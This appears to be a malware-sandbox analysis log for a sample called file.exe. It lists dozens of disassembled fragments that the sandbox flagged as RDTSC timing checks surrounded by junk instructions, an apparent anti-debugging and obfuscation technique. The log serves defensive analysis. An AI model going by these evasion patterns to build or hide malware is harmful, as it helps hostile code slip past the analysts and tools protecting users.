              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599407 second address: 599412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59955C second address: 599572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599572 second address: 599576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599576 second address: 599586 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 jng 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5996F4 second address: 5996F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CB8F second address: 59CB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CB93 second address: 59CB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CB9F second address: 59CBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBA3 second address: 59CBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537035 second address: 53704A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59EE90 second address: 59EEA2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD001095A56h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A5E second address: 5A5A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A69 second address: 5A5A73 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A73 second address: 5A5A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD000CC0C56h 0x0000000e ja 00007FD000CC0C56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5566 second address: 5A5572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5572 second address: 5A5594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C5Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5594 second address: 5A55BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD001095A56h 0x0000000a jne 00007FD001095A56h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD001095A63h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A58C7 second address: 5A58CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A58CF second address: 5A58F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD001095A65h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD001095A56h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AE2AA second address: 5AE2B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AE2B1 second address: 5AE2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FD001095A60h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE19 second address: 5ACE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007FD000CC0C56h 0x00000012 jmp 00007FD000CC0C5Bh 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE3C second address: 5ACE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD001095A56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE48 second address: 5ACE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE53 second address: 5ACE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FD001095A56h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD136 second address: 5AD13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD67C second address: 5AD692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD692 second address: 5AD6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD6AF second address: 5AD6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ADBE9 second address: 5ADBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ADBED second address: 5ADBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ADBF3 second address: 5ADC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FD000CC0C56h 0x00000009 jmp 00007FD000CC0C60h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACB31 second address: 5ACB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A62h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACB4B second address: 5ACB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4D3A second address: 5B4D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A65h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4D59 second address: 5B4D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5760CD second address: 5760D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5760D1 second address: 5760DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576160 second address: 57618D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FD001095A56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD001095A67h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57618D second address: 576193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576193 second address: 5761EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD001095A5Ch 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnp 00007FD001095A5Ah 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e pop eax 0x0000001f jmp 00007FD001095A61h 0x00000024 call 00007FD001095A59h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007FD001095A56h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5761EA second address: 5761EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5761EE second address: 5761F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5761F4 second address: 57623E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C5Ch 0x00000008 jg 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007FD000CC0C5Ah 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007FD000CC0C5Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FD000CC0C65h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57623E second address: 576243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576300 second address: 576305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5763B2 second address: 5763C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5763C3 second address: 5763C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769D9 second address: 5769DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769DD second address: 5769E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769E1 second address: 5769E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769E7 second address: 576A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FD000CC0C62h 0x0000000f nop 0x00000010 jmp 00007FD000CC0C5Eh 0x00000015 push 0000001Eh 0x00000017 mov edx, dword ptr [ebp+122D3AA3h] 0x0000001d jne 00007FD000CC0C5Eh 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 mov bx, 1165h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d jmp 00007FD000CC0C69h 0x00000032 jo 00007FD000CC0C58h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576A51 second address: 576A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576EA0 second address: 576EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C69h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576EBE second address: 576EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576EC4 second address: 55D862 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D2C83h] 0x00000011 call dword ptr [ebp+122D2B18h] 0x00000017 push edi 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B51A4 second address: 5B51AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B51AC second address: 5B51B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B52D8 second address: 5B52E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B52E1 second address: 5B52E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B52E5 second address: 5B52E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B52E9 second address: 5B52EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B52EF second address: 5B52F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5475 second address: 5B5479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5479 second address: 5B5487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD001095A56h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5487 second address: 5B549C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 jc 00007FD000CC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B549C second address: 5B54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A5Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B54AF second address: 5B54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5740 second address: 5B5773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 jmp 00007FD001095A63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5773 second address: 5B5788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FD000CC0C56h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5788 second address: 5B5793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5793 second address: 5B579D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5929 second address: 5B592F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B592F second address: 5B5935 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5935 second address: 5B595C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 js 00007FD001095A81h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD001095A63h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B595C second address: 5B5962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5AC6 second address: 5B5ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA39C second address: 5BA3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA3A0 second address: 5BA3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA3A9 second address: 5BA3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA3B2 second address: 5BA3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB1C4 second address: 5BB1CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB1CA second address: 5BB1D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C0564 second address: 5C056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C056A second address: 5C0579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C0579 second address: 5C0584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD000CC0C56h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52CF4D second address: 52CF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007FD001095A65h 0x00000012 popad 0x00000013 pushad 0x00000014 ja 00007FD001095A5Ah 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7313 second address: 5C731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C77A8 second address: 5C77AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7902 second address: 5C7919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD000CC0C61h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA620 second address: 5CA655 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FD001095A56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD001095A61h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FD001095A56h 0x0000001a jmp 00007FD001095A5Fh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA655 second address: 5CA659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA7B0 second address: 5CA7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D07A0 second address: 5D07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D07AA second address: 5D07B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D07B4 second address: 5D07D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD000CC0C64h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD000CC0C5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FD000CC0C56h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF2E2 second address: 5CF2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
